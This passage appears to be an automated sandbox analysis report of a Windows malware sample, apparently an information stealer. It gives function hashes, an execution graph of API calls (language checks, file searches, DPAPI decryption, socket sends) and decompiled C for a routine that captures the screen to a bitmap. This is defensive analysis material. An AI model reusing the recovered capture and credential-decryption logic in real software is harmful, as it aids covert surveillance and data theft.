                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56e96ab959194b75cdec898f25c9b02b3484fcd0b1585bb6fc46c42557e00301
                                                  • Instruction ID: 18a6d8f6103505e7ada59c7aeb309041ff12ccb7070a245f31e1cbdcc0258ff5
                                                  • Opcode Fuzzy Hash: 56e96ab959194b75cdec898f25c9b02b3484fcd0b1585bb6fc46c42557e00301
                                                  • Instruction Fuzzy Hash: 7FF0E2F0C192A9DFC7118FA098545BDFFB0FB07302F04C0EAE886A72A2D6784A04DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F182F Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cfbb614b30e429d5124af11338f11f361e13ecba280b454d0f07f3bae58d896d
                                                  • Instruction ID: 68126a26fe62db46cde9e8ae80f66d6c2372baf7cb25b174c582ebd83e05d945
                                                  • Opcode Fuzzy Hash: cfbb614b30e429d5124af11338f11f361e13ecba280b454d0f07f3bae58d896d
                                                  • Instruction Fuzzy Hash: C4E0D8A2C1838BDDD7118F74C51528AFFB05F02164FA489AEC0E19A582C73A41528F81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F1840 Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4cfbedb73f701c7b0f26c931164b435e6c0e418a1c9cfb51c27ae1477d8c3af
                                                  • Instruction ID: 17ba68870e243ed6d02f8d50b767f16c5fe09bc06d238aef0b074dbf1231f1a5
                                                  • Opcode Fuzzy Hash: b4cfbedb73f701c7b0f26c931164b435e6c0e418a1c9cfb51c27ae1477d8c3af
                                                  • Instruction Fuzzy Hash: 10D0ECB0C2430DDED740EFB9850535EBAF0AB04240F50897AC514E2200E7B542118F96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 072F1208 Relevance: 1.6, Strings: 1, Instructions: 354COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *
                                                  • API String ID: 0-163128923
                                                  • Opcode ID: de043e402b596624529153e91cfc29cdce30aee16c052809904a6553098e9312
                                                  • Instruction ID: 56d3818fdc8960931777f73a81b02653cd29b451d859e15f4e173a5012a08287
                                                  • Opcode Fuzzy Hash: de043e402b596624529153e91cfc29cdce30aee16c052809904a6553098e9312
                                                  • Instruction Fuzzy Hash: C9D1BBB171020ACFEB25DB7AC560BAAB7E6AF89300F54447DD246CB291DF38E901CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A9E618 Relevance: .3, Instructions: 315COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65c3f8e2a5d4f6bf217bf8ce22bcc78414fe5e4efc9dddcda4d7e168d3bcd162
                                                  • Instruction ID: e2f3c22259a93e492bddbf87dc0af27478b5503b0857f2c7747c19f755a3fd29
                                                  • Opcode Fuzzy Hash: 65c3f8e2a5d4f6bf217bf8ce22bcc78414fe5e4efc9dddcda4d7e168d3bcd162
                                                  • Instruction Fuzzy Hash: 2812D7F1C917468AD732CF66E8C81893BA0B7643A8FD04A08D2711BED9D7B8156ECF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 072F0448 Relevance: .3, Instructions: 298COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.564030968.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72f0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a371baa102028efcc287c697e631f55978795f9a82a058055b7fb6d21633622c
                                                  • Instruction ID: 168e51d7066ba3e697707ca8af43458d9545e822422eface32c8c7b3f279f302
                                                  • Opcode Fuzzy Hash: a371baa102028efcc287c697e631f55978795f9a82a058055b7fb6d21633622c
                                                  • Instruction Fuzzy Hash: A5D1A374B106098FDB14DF69C598AA9B7F1BF8D705F2580B8E50AAB362DB31AD40CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A9C1D4 Relevance: .3, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9d03e39a131bf73bb42530a4398d6fe4f87205cec9339425206866c6a50d2b6
                                                  • Instruction ID: bb96a678e200c8bf49b807a5b81b5d22271f83d380d890c59d2c84cf408e9b64
                                                  • Opcode Fuzzy Hash: d9d03e39a131bf73bb42530a4398d6fe4f87205cec9339425206866c6a50d2b6
                                                  • Instruction Fuzzy Hash: 84A15B32E006198FCF05EFB6C98459EBBF2FF89304B15856AE905AB261DF31A955CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02A9E608 Relevance: .2, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.556677097.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2a90000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34a94bed585da01f90fc31ac44a936605fd5d1d7fa2c282357c1bab887d0eafa
                                                  • Instruction ID: c6f3c3611ff50417012530bd89caeeebff22d6111202524ca61733ad8e28ac27
                                                  • Opcode Fuzzy Hash: 34a94bed585da01f90fc31ac44a936605fd5d1d7fa2c282357c1bab887d0eafa
                                                  • Instruction Fuzzy Hash: 27C12DF1C917468BD722CF66E8C81893BA1FB653A4FD04B08D2612BED8D7B4146ACF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:28.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:33%
                                                  Total number of Nodes:348
                                                  Total number of Limit Nodes:8
                                                  execution_graph 2214 4021e3 InitializeCriticalSectionAndSpinCount 2215 402202 2214->2215 2216 402207 CreateMutexA 2214->2216 2217 402660 ExitProcess 2216->2217 2218 402223 2216->2218 2218->2217 2288 403b82 2218->2288 2220 402637 DeleteCriticalSection 2220->2217 2221 40223f 2221->2220 2292 4044ac 2221->2292 2231 4022d3 2320 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2231->2320 2233 4022e2 2321 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2233->2321 2235 4025c2 2351 403d26 EnterCriticalSection 2235->2351 2237 4025db 2364 40351e 2237->2364 2238 4022f1 2238->2235 2322 40439a GetModuleHandleA 2238->2322 2242 402353 2242->2235 2325 401f03 GetUserDefaultUILanguage 2242->2325 2243 40351e 2 API calls 2244 4025f3 2243->2244 2246 40351e 2 API calls 2244->2246 2248 4025fe 2246->2248 2250 40351e 2 API calls 2248->2250 2249 4023a7 2249->2215 2253 4023d0 ExitProcess 2249->2253 2257 4023d8 2249->2257 2252 402609 2250->2252 2251 40439a 2 API calls 2251->2249 2254 402192 3 API calls 2252->2254 2255 402619 2254->2255 2259 40262f 2255->2259 2367 405002 2255->2367 2258 402405 ExitProcess 2257->2258 2261 40240d 2257->2261 2260 40351e 2 API calls 2259->2260 2260->2220 2262 402442 2261->2262 2263 40243a ExitProcess 2261->2263 2264 40244d CreateThread CreateThread CreateThread CreateThread WaitForMultipleObjects 2262->2264 2336 40202a 2264->2336 2422 404e34 2264->2422 2430 404868 2264->2430 2456 4019cf 2264->2456 2462 401d2f 2264->2462 2268 402526 2269 404ece 4 API calls 2268->2269 2270 402534 2269->2270 2271 404ece 4 API calls 2270->2271 2272 402544 2271->2272 2273 404ece 4 API calls 2272->2273 2274 402553 2273->2274 2275 404ece 4 API calls 2274->2275 2276 402563 2275->2276 2277 404ece 4 API calls 2276->2277 2278 402572 2277->2278 2385 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2278->2385 2280 40257c 2281 402595 2280->2281 2282 402585 GetModuleFileNameW 2280->2282 2283 404ece 4 API calls 2281->2283 2282->2281 2284 4025af 2283->2284 2285 404ece 4 API calls 2284->2285 2286 4025ba 2285->2286 2287 40351e 2 API calls 2286->2287 2287->2235 2289 403b8a 2288->2289 2386 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2289->2386 2291 403b95 2291->2221 2293 40439a 2 API calls 2292->2293 2294 4044d8 2293->2294 2295 404ece 4 API calls 2294->2295 2300 402271 2294->2300 2296 4044ee 2295->2296 2297 404ece 4 API calls 2296->2297 2298 4044f9 2297->2298 2299 404ece 4 API calls 2298->2299 2299->2300 2300->2220 2301 402192 GetCursorPos 2300->2301 2302 4021a6 2301->2302 2304 4021a8 2301->2304 2306 4035c3 2302->2306 2303 4021b9 GetCursorPos 2303->2302 2303->2304 2304->2302 2304->2303 2305 4021d5 Sleep 2304->2305 2305->2304 2387 402bf0 2306->2387 2309 404511 2310 404526 VirtualAlloc 2309->2310 2313 4022b7 2309->2313 2311 404545 2310->2311 2310->2313 2312 40439a 2 API calls 2311->2312 2314 404567 2312->2314 2313->2220 2319 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2313->2319 2314->2313 2315 404596 GetCurrentProcess IsWow64Process 2314->2315 2317 404ece 4 API calls 2315->2317 2318 4045c0 2317->2318 2318->2313 2319->2231 2320->2233 2321->2238 2323 4043b8 LoadLibraryA 2322->2323 2324 4043c5 2322->2324 2323->2324 2324->2242 2326 401f76 2325->2326 2327 4035c3 7 API calls 2326->2327 2328 401fae 2327->2328 2329 4035c3 7 API calls 2328->2329 2330 401fbd GetKeyboardLayoutList 2329->2330 2331 402018 2330->2331 2333 401fd7 2330->2333 2332 4035c3 7 API calls 2331->2332 2334 402024 2332->2334 2333->2331 2335 4035c3 7 API calls 2333->2335 2334->2249 2334->2251 2335->2333 2407 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2336->2407 2338 4020d9 GetCurrentHwProfileA 2339 4020e8 2338->2339 2340 4020fc GetSystemInfo 2338->2340 2341 4035c3 7 API calls 2339->2341 2342 4035c3 7 API calls 2340->2342 2343 4020f9 2341->2343 2344 40211c 2342->2344 2343->2340 2346 40351e 2 API calls 2344->2346 2345 40204f 2345->2338 2349 402126 2346->2349 2347 402178 EnumDisplayDevicesA 2348 40218b 2347->2348 2347->2349 2381 404ece 2348->2381 2349->2347 2350 4035c3 7 API calls 2349->2350 2350->2349 2352 403e54 LeaveCriticalSection 2351->2352 2353 403d48 2351->2353 2352->2237 2353->2352 2408 403ccc 2353->2408 2357 403d9c 2413 406914 2357->2413 2359 403da6 2360 40351e 2 API calls 2359->2360 2361 403dff 2360->2361 2362 40351e 2 API calls 2361->2362 2363 403e4f 2362->2363 2363->2352 2365 4025e8 2364->2365 2366 403522 GetProcessHeap RtlFreeHeap 2364->2366 2365->2243 2366->2365 2368 40439a 2 API calls 2367->2368 2369 405085 2368->2369 2370 40508d 2369->2370 2371 405102 socket 2369->2371 2370->2255 2371->2370 2372 405126 2371->2372 2373 405146 connect 2372->2373 2374 4051b9 closesocket 2372->2374 2375 4051ac Sleep 2373->2375 2376 40515d send 2373->2376 2374->2370 2375->2372 2376->2375 2377 40517f send 2376->2377 2377->2375 2378 40519b 2377->2378 2379 40351e 2 API calls 2378->2379 2380 4051a6 2379->2380 2380->2374 2382 404ef1 2381->2382 2383 404f1d 2381->2383 2382->2383 2421 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2382->2421 2383->2268 2385->2280 2386->2291 2388 402c00 2387->2388 2396 402c0e 2387->2396 2397 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2388->2397 2390 402c5e 2391 40229c 2390->2391 2402 404e8b 2390->2402 2391->2309 2393 40301e 2394 40351e 2 API calls 2393->2394 2394->2391 2396->2390 2398 402979 2396->2398 2397->2396 2399 402991 2398->2399 2400 402b8d IsDBCSLeadByte 2399->2400 2401 4029c1 __aulldvrm 2399->2401 2400->2399 2401->2396 2403 404ea6 2402->2403 2404 404e9c 2402->2404 2403->2393 2406 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2404->2406 2406->2403 2407->2345 2410 403cea 2408->2410 2409 403cff 2409->2352 2412 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2409->2412 2410->2409 2416 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2410->2416 2412->2357 2417 4069ee 2413->2417 2415 40691f 2415->2359 2416->2409 2420 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2417->2420 2419 4069f6 2419->2415 2420->2419 2421->2382 2423 404e42 2422->2423 2424 404e83 2422->2424 2478 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2423->2478 2426 404e4c 2428 404e7c 2426->2428 2479 404abc 2426->2479 2429 40351e 2 API calls 2428->2429 2429->2424 2431 404ab3 2430->2431 2432 40487b 2430->2432 2433 40439a 2 API calls 2432->2433 2434 404898 2433->2434 2434->2431 2435 4048a0 KiUserCallbackDispatcher GetSystemMetrics 2434->2435 2436 4048c5 2435->2436 2437 4048eb GetDC 2436->2437 2437->2431 2438 4048ff GetCurrentObject 2437->2438 2439 404912 GetObjectW 2438->2439 2440 404aaa ReleaseDC 2438->2440 2439->2440 2441 404929 2439->2441 2440->2431 2442 4035c3 7 API calls 2441->2442 2443 404943 DeleteObject CreateCompatibleDC 2442->2443 2443->2440 2444 4049bb CreateDIBSection 2443->2444 2445 404aa3 DeleteDC 2444->2445 2446 4049dc SelectObject 2444->2446 2445->2440 2447 404a9c DeleteObject 2446->2447 2448 4049ec BitBlt 2446->2448 2447->2445 2448->2447 2449 404a11 2448->2449 2520 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2449->2520 2451 404a99 2451->2447 2452 404a1c 2452->2451 2453 403d26 8 API calls 2452->2453 2454 404a8f 2453->2454 2455 40351e 2 API calls 2454->2455 2455->2451 2457 401a18 2456->2457 2458 4019dd 2456->2458 2460 4019fa 2458->2460 2521 401000 2458->2521 2460->2457 2461 401000 38 API calls 2460->2461 2461->2457 2463 401d47 2462->2463 2464 401efb 2462->2464 2463->2464 2465 4035e8 5 API calls 2463->2465 2466 401d68 FindFirstFileW 2465->2466 2466->2464 2467 401d87 2466->2467 2628 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2467->2628 2469 401ed7 FindNextFileW 2470 401ef2 2469->2470 2473 401d91 2469->2473 2471 40351e 2 API calls 2470->2471 2471->2464 2473->2469 2474 40351e 2 API calls 2473->2474 2475 401d2f 22 API calls 2473->2475 2476 4035e8 IsDBCSLeadByte IsDBCSLeadByte MultiByteToWideChar IsDBCSLeadByte MultiByteToWideChar 2473->2476 2477 403e66 22 API calls 2473->2477 2629 40403b 2473->2629 2474->2473 2475->2473 2476->2473 2477->2473 2478->2426 2480 404b1f 2479->2480 2481 404ade 2479->2481 2489 404e27 2480->2489 2505 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2480->2505 2482 4035e8 5 API calls 2481->2482 2484 404b15 2482->2484 2510 40402b GetFileAttributesW 2484->2510 2485 404b3f 2506 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2485->2506 2488 404b49 2507 4035e8 2488->2507 2489->2426 2492 404e18 2493 40351e 2 API calls 2492->2493 2494 404e1f 2493->2494 2495 40351e 2 API calls 2494->2495 2495->2489 2496 404e00 FindNextFileW 2496->2492 2497 404b74 2496->2497 2497->2496 2498 4035e8 IsDBCSLeadByte IsDBCSLeadByte MultiByteToWideChar IsDBCSLeadByte MultiByteToWideChar 2497->2498 2500 404c19 EnterCriticalSection 2497->2500 2503 404abc 22 API calls 2497->2503 2504 403e66 22 API calls 2497->2504 2511 40402b GetFileAttributesW 2497->2511 2498->2497 2501 404abc 22 API calls 2500->2501 2502 404c34 LeaveCriticalSection 2501->2502 2502->2496 2503->2497 2504->2497 2505->2485 2506->2488 2512 40306c 2507->2512 2510->2480 2511->2497 2514 403078 2512->2514 2513 4034aa FindFirstFileW 2513->2492 2513->2497 2514->2513 2515 402979 IsDBCSLeadByte 2514->2515 2516 403285 IsDBCSLeadByte 2514->2516 2518 4032f0 IsDBCSLeadByte 2514->2518 2519 403311 MultiByteToWideChar 2514->2519 2515->2514 2516->2514 2517 403292 MultiByteToWideChar 2516->2517 2517->2514 2518->2514 2519->2514 2520->2452 2522 4012da 2521->2522 2523 40101e 2521->2523 2522->2460 2523->2522 2558 40402b GetFileAttributesW 2523->2558 2525 401035 2525->2522 2559 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2525->2559 2527 401049 2560 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2527->2560 2529 401052 2531 4035e8 5 API calls 2529->2531 2535 40129d 2529->2535 2530 40351e 2 API calls 2532 4012d3 2530->2532 2533 401156 FindFirstFileW 2531->2533 2534 40351e 2 API calls 2532->2534 2533->2535 2556 401173 2533->2556 2534->2522 2535->2530 2536 401285 FindNextFileW 2536->2535 2536->2556 2537 4035e8 IsDBCSLeadByte IsDBCSLeadByte MultiByteToWideChar IsDBCSLeadByte MultiByteToWideChar 2537->2556 2539 403e66 22 API calls 2539->2556 2540 40169d EnterCriticalSection 2541 404abc 26 API calls 2540->2541 2542 4016b9 LeaveCriticalSection 2541->2542 2542->2556 2543 403eaa 24 API calls 2555 401251 2543->2555 2545 404068 13 API calls 2545->2555 2547 4035e8 5 API calls 2547->2555 2550 40351e GetProcessHeap RtlFreeHeap 2550->2556 2554 403d26 8 API calls 2554->2556 2555->2540 2555->2543 2555->2545 2555->2547 2555->2556 2606 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2555->2606 2607 403e66 2555->2607 2556->2536 2556->2537 2556->2539 2556->2540 2556->2550 2556->2554 2556->2555 2557 401000 34 API calls 2556->2557 2561 404186 2556->2561 2584 403684 2556->2584 2588 401a55 2556->2588 2596 401c87 2556->2596 2603 401b98 2556->2603 2614 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2556->2614 2557->2556 2558->2525 2559->2527 2560->2529 2615 40402b GetFileAttributesW 2561->2615 2563 404198 2564 404393 2563->2564 2616 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2563->2616 2564->2556 2566 4041ae 2567 40438b 2566->2567 2568 4035e8 5 API calls 2566->2568 2569 40351e 2 API calls 2567->2569 2570 4041cb 2568->2570 2569->2564 2571 4041e9 EnterCriticalSection 2570->2571 2572 404253 LeaveCriticalSection 2571->2572 2572->2567 2573 40426b 2572->2573 2574 404284 EnterCriticalSection 2573->2574 2575 4042bb LeaveCriticalSection 2574->2575 2576 4042d3 2575->2576 2577 404357 EnterCriticalSection 2575->2577 2617 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2576->2617 2580 404380 LeaveCriticalSection 2577->2580 2579 4042dd 2579->2577 2581 4042fa EnterCriticalSection 2579->2581 2580->2567 2582 40433b LeaveCriticalSection 2581->2582 2582->2577 2583 40434f 2582->2583 2583->2577 2585 403698 2584->2585 2587 40369c 2585->2587 2618 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2585->2618 2587->2556 2589 401a6d 2588->2589 2591 401a72 2588->2591 2619 401a20 2589->2619 2594 401a77 2591->2594 2622 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2591->2622 2594->2556 2595 401aa6 2595->2594 2623 401a42 2595->2623 2597 40439a 2 API calls 2596->2597 2598 401cc0 2597->2598 2599 401cd0 CryptUnprotectData 2598->2599 2601 401ced 2598->2601 2600 401cf8 2599->2600 2599->2601 2600->2601 2602 401cff CryptProtectData 2600->2602 2601->2556 2602->2601 2627 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2603->2627 2605 401bbe 2605->2556 2606->2555 2608 404186 20 API calls 2607->2608 2609 403e7c 2608->2609 2610 403e9b 2609->2610 2612 403d26 8 API calls 2609->2612 2611 40351e 2 API calls 2610->2611 2613 403ea4 2611->2613 2612->2610 2613->2555 2614->2556 2615->2563 2616->2566 2617->2579 2618->2587 2626 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2619->2626 2621 401a2a 2621->2591 2622->2595 2624 40351e 2 API calls 2623->2624 2625 401a4d 2624->2625 2625->2594 2626->2621 2627->2605 2628->2473 2630 404043 2629->2630 2631 404055 2630->2631 2634 40363f 2630->2634 2631->2473 2635 403653 2634->2635 2637 403657 2635->2637 2638 4034f0 EnterCriticalSection GetProcessHeap RtlAllocateHeap LeaveCriticalSection 2635->2638 2637->2473 2638->2637

                                                  Executed Functions

                                                  Function 00404868 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 196windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 97%
                                                  			E00404868(char _a4) {
				short _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				int _v24;
				void* _v28;
				struct HDC__* _v32;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				char _v48;
				int _v52;
				int _v56;
				intOrPtr _v62;
				char _v72;
				signed int _v96;
				short _v98;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				void _v112;
				signed int _v128;
				int _v132;
				void _v136;
				struct tagBITMAPINFO _v180;
				void* _t58;
				int _t59;
				int _t60;
				int _t68;
				signed int _t69;
				short _t73;
				void* _t78;
				struct HDC__* _t84;
				void* _t87;
				short _t96;
				short _t97;
				short _t98;
				short _t99;
				short _t100;
				short _t101;
				struct HDC__* _t110;
				signed int _t116;
				int _t134;
				int _t136;
				struct HDC__* _t140;
				void* _t141;
				void* _t145;
				void* _t147;

				if(_a4 == 0) {
					return _t58;
				}
				_v12 = 0x33696467;
				_t3 =  &_v12; // 0x33696467
				_v8 = 0x32;
				_t59 = E0040439A(_t3, 0x408000);
				if(_t59 != 0xa) {
					L16:
					return _t59;
				}
				_v28 = 0;
				_t60 = GetSystemMetrics(0x4c); // executed
				_v56 = _t60;
				_v52 = GetSystemMetrics(0x4d);
				E0040355E( &_v72, 0, 0xe);
				E0040355E( &_v112, 0, 0x28);
				E0040355E( &_v180, 0, 0x2c);
				_t134 = 0x18;
				E0040355E( &_v136, 0, _t134);
				_t59 = GetDC(0);
				_t110 = _t59;
				if(_t110 == 0) {
					L15:
					goto L16;
				}
				_t145 = GetCurrentObject(_t110, 7);
				if(_t145 != 0) {
					_t68 = GetObjectW(_t145, _t134,  &_v136);
					_t157 = _t68;
					if(_t68 != 0) {
						_t69 = _v128;
						_t136 = _v132;
						_push(_t69);
						_v24 = _t136;
						_v16 = _t69;
						E004035C3(_t157, 0, "- ScreenSize: {lWidth=%d, lHeight=%d}\r\n", _t136);
						DeleteObject(_t145); // executed
						_v96 = _v96 & 0x00000000;
						_v72 = 0x4d42;
						_t73 = 0x18;
						_v98 = _t73;
						_v108 = _t136;
						_v100 = 1;
						_v104 = _v16;
						_t116 = 0xa;
						_v112 = 0x28;
						_t78 = memcpy( &_v180,  &_v112, _t116 << 2);
						_v62 = 0x36;
						asm("cdq");
						_v20 = ((_t78 + 0x0000001f & 0xffffffe0) >> 3) * _v16;
						_t84 = CreateCompatibleDC(_t110); // executed
						_t140 = _t84;
						_v32 = _t140;
						if(_t140 != 0) {
							_t87 = CreateDIBSection(_t110,  &_v180, 0,  &_v28, 0, 0); // executed
							_t147 = _t87;
							if(_t147 != 0) {
								if(SelectObject(_t140, _t147) != 0 && BitBlt(_t140, 0, 0, _v24, _v16, _t110, _v56, _v52, 0xcc0020) != 0) {
									_t141 = E004034F0(_v20 + 0x37);
									if(_t141 != 0) {
										E00403533(_t141,  &_v72, 0xe);
										_t42 = _t141 + 0xe; // 0xe
										E00403533(_t42,  &_v180, 0x28);
										_t46 = _t141 + 0x36; // 0x36
										E00403533(_t46, _v28, _v20);
										_t96 = 0x24;
										_v48 = _t96;
										_t97 = 0x73;
										_v46 = _t97;
										_t98 = 0x2e;
										_t50 =  &_a4; // 0x33696467
										_v44 = _t98;
										_t99 = 0x62;
										_v42 = _t99;
										_t100 = 0x6d;
										_v40 = _t100;
										_t101 = 0x70;
										_v38 = _t101;
										_v36 = 0;
										E00403D26( *_t50,  &_v48, _t141, _v20 + 0x36); // executed
										E0040351E(_t141);
									}
									_t140 = _v32;
								}
								DeleteObject(_t147);
							}
							DeleteDC(_t140);
						}
					}
				}
				_t59 = ReleaseDC(0, _t110);
				goto L15;
			}






















































                                                  0x00404875
                                                  0x00404ab9
                                                  0x00404ab9
                                                  0x00404881
                                                  0x00404888
                                                  0x0040488b
                                                  0x00404893
                                                  0x0040489a
                                                  0x00404ab5
                                                  0x00000000
                                                  0x00404ab5
                                                  0x004048aa
                                                  0x004048ad
                                                  0x004048b1
                                                  0x004048ba
                                                  0x004048c0
                                                  0x004048ca
                                                  0x004048d7
                                                  0x004048de
                                                  0x004048e6
                                                  0x004048ef
                                                  0x004048f5
                                                  0x004048f9
                                                  0x00404ab3
                                                  0x00000000
                                                  0x00404ab4
                                                  0x00404908
                                                  0x0040490c
                                                  0x0040491b
                                                  0x00404921
                                                  0x00404923
                                                  0x00404929
                                                  0x0040492c
                                                  0x0040492f
                                                  0x00404938
                                                  0x0040493b
                                                  0x0040493e
                                                  0x00404947
                                                  0x00404954
                                                  0x00404958
                                                  0x0040495f
                                                  0x00404960
                                                  0x00404967
                                                  0x0040496a
                                                  0x00404977
                                                  0x00404980
                                                  0x00404981
                                                  0x00404988
                                                  0x0040498d
                                                  0x00404997
                                                  0x004049a5
                                                  0x004049a8
                                                  0x004049ae
                                                  0x004049b0
                                                  0x004049b5
                                                  0x004049cc
                                                  0x004049d2
                                                  0x004049d6
                                                  0x004049e6
                                                  0x00404a1c
                                                  0x00404a20
                                                  0x00404a29
                                                  0x00404a30
                                                  0x00404a39
                                                  0x00404a44
                                                  0x00404a47
                                                  0x00404a4e
                                                  0x00404a51
                                                  0x00404a58
                                                  0x00404a5b
                                                  0x00404a5f
                                                  0x00404a60
                                                  0x00404a65
                                                  0x00404a69
                                                  0x00404a6a
                                                  0x00404a70
                                                  0x00404a71
                                                  0x00404a77
                                                  0x00404a78
                                                  0x00404a7e
                                                  0x00404a8a
                                                  0x00404a94
                                                  0x00404a94
                                                  0x00404a99
                                                  0x00404a99
                                                  0x00404a9d
                                                  0x00404a9d
                                                  0x00404aa4
                                                  0x00404aa4
                                                  0x004049b5
                                                  0x00404923
                                                  0x00404aad
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 0040439A: GetModuleHandleA.KERNEL32(ntdl,0000011C,?,?,?,?,?,?,?,004044D8), ref: 004043AC
                                                    • Part of subcall function 0040439A: LoadLibraryA.KERNELBASE(ntdl,?,?,?,?,?,?,?,004044D8), ref: 004043B9
                                                  • KiUserCallbackDispatcher.NTDLL ref: 004048AD
                                                  • GetSystemMetrics.USER32 ref: 004048B4
                                                  • GetDC.USER32(00000000), ref: 004048EF
                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 00404902
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0040491B
                                                  • DeleteObject.GDI32(00000000), ref: 00404947
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 004049A8
